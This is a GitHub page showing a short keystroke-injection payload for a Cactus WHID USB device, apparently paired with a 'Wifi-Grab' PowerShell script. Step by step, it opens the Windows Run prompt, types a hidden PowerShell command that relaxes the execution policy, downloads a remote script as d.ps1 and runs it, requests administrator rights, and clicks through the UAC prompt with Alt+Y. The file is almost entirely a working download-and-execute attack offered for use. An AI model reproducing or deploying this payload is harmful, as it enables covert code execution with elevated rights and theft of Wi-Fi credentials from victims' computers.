-
Notifications
You must be signed in to change notification settings - Fork 87
/
cactuswhid.txt
30 lines (22 loc) · 992 Bytes
/
cactuswhid.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Rem:the powershell script and this payload can be found at
Rem:https://github.com/axel05869/Wifi-Grab
Rem:--------GUIDE---------
Rem:download the powershell script.
Rem:edit and add the required data.
Rem:copy and paste all the text to notepad and save as anyname.txt.
Rem:upload the text to: https://cutt.ly/WjnNPa4
Rem:copy the direct download link.
CustomDelay:500
Rem:Opens the Windows Run prompt.
Press:131+114
Rem:Delays 0.2 seconds to give the Run prompt time to open.
CustomDelay:200
Rem:this command will download the text and save as d.ps1 then run
Rem:if the script failed to run change the ExecPolicy to Bypass
Print:powershell /w 1 /C Set-ExecutionPolicy RemoteSigned;wget \"DOWNLOAD_LINK\" -o \d.ps1;\d.ps1
Rem:Presses Ctrl + Shift + Enter to execute the PowerShell with administrative privileges.
Press:128+129+176
Rem:Delay 0.5 seconds to give the UAC prompt time to open.
CustomDelay:500
Rem:Presses Alt + Y to bypass UAC.
Press:130+121